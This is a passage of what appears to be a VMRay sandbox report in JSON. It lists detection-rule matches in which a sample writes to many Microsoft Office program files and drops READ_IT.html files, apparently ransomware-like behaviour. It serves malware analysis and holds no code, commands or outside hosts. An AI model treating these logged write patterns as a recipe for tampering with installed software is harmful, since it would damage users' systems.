"registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24701", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24710", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImages16x16.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimages16x16.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24717", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimages16x16.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolImagesMask16x16.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimagesmask16x16.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24724", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtoolimagesmask16x16.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24731", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WSSFilesToolIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24738", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\wssfilestooliconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\CAN.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\can.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24745", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\can.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24757", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\COUPLER.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\coupler.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24760", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\coupler.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\HORN.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\horn.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24771", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\horn.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOT.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shot.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24782", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shot.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SHOVEL.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shovel.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24793", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\shovel.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\SPLASH.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24806", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\splash.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24819", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\ALARM.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\alarm.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24828", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\alarm.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24838", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\BUZZ.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\buzz.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24841", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\buzz.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\LASER.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\laser.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24854", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\laser.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\RADAR.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24867", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\radar.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24882", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\VIBE.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24895", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\vibe.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\WARN.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24908", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\warn.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\COUGH.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\cough.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24919", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\cough.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24927", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\GIGGLE.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\giggle.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24930", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\giggle.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\HICCUP.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\hiccup.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24939", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\hiccup.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\MMHMM.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\mmhmm.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24946", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\mmhmm.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\SNEEZE.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\sneeze.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24953", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\sneeze.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\THROAT.WAV", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\throat.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24964", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\throat.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24975", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITL.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24991", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\activitl.ico\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24997", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\forms\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\ACTIVITS.ICO", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\forms\\1033\\activits.ico", "operations": 